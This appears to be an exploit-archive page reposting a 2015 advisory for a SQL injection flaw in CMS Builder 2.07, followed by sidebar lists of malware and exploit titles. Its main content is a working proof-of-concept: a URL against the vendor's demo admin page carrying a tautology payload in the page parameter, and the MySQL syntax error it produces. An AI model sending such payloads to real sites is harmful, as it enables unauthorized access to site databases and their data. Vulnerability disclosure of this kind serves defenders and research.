Home / os / wins2003

CMS Builder 2.07 SQL Injection

Posted on 28 March 2015

# Affected software: CMS Builder v2.07 # Type of vulnerability: sql injection # URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php # Discovered by: Provensec # Website: http://www.provensec.com #versionv2.07 # Proof of concept http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload demo:-> http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-25' at line 9

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

pgAdmin 8.3 Remote Code Execution
Palo Alto OS Command Injection
Backdoor.Win32.Dumador.c MVID-2024-0679 Buffer Overflow
Centreon 23.10-1.el8 SQL Injection
Stock Management System 1.0 SQL Injection

Last 20